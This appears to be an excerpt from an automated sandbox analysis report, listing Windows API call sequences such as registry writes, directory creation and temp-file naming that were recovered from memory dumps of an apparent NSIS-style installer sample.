                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: MessageSend$Timeout
                                      • String ID: !
                                      • API String ID: 1777923405-2657877971
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(0079E4D8), ref: 00404EBD
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(?,0079E4D8), ref: 00404ECD
                                        • Part of subcall function 00404E84: lstrcatA.KERNEL32(0079E4D8,?,?,0079E4D8), ref: 00404EE0
                                        • Part of subcall function 00404E84: SetWindowTextA.USER32(0079E4D8,0079E4D8), ref: 00404EF2
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                      • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                      • String ID:
                                      • API String ID: 2987980305-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402358
                                      • lstrlenA.KERNEL32(0040A398,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402378
                                      • RegSetValueExA.ADVAPI32(?,?,?,?,0040A398,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B1
                                      • RegCloseKey.ADVAPI32(?,?,?,0040A398,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: CloseCreateValuelstrlen
                                      • String ID:
                                      • API String ID: 1356686001-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 004056BD: CharNextA.USER32(?,00000000,?,?,004015C2,00000000,000000F0), ref: 004056CB
                                        • Part of subcall function 004056BD: CharNextA.USER32(00000000,?,?,004015C2,00000000,000000F0), ref: 004056D0
                                        • Part of subcall function 004056BD: CharNextA.USER32(00000000,?,?,004015C2,00000000,000000F0), ref: 004056E4
                                      • CreateDirectoryA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                      • GetFileAttributesA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                      • SetCurrentDirectoryA.KERNEL32(00000000,007A8800,00000000,00000000,000000F0), ref: 00401622
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                      • String ID:
                                      • API String ID: 3751793516-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                      • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                        • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                      • String ID:
                                      • API String ID: 1404258612-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • DestroyWindow.USER32(?,00000000,00402DAF,00000001), ref: 00402BE2
                                      • GetTickCount.KERNEL32 ref: 00402C00
                                      • CreateDialogParamA.USER32(0000006F,00000000,00402B4C,00000000), ref: 00402C1D
                                      • ShowWindow.USER32(00000000,00000005), ref: 00402C2B
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00405868
                                      • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405882
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: nsa
                                      • API String ID: 1716503409-2209301699
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlenA.KERNEL32(0040599C,?,00000000,00000000,?,00000000,0040599C,00000000,[Rename]), ref: 0040579A
                                      • lstrcmpiA.KERNEL32(00000000,0040599C), ref: 004057B2
                                      • CharNextA.USER32(00000000,?,00000000,0040599C,00000000,[Rename]), ref: 004057C3
                                      • lstrlenA.KERNEL32(00000000,?,00000000,0040599C,00000000,[Rename]), ref: 004057CC
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%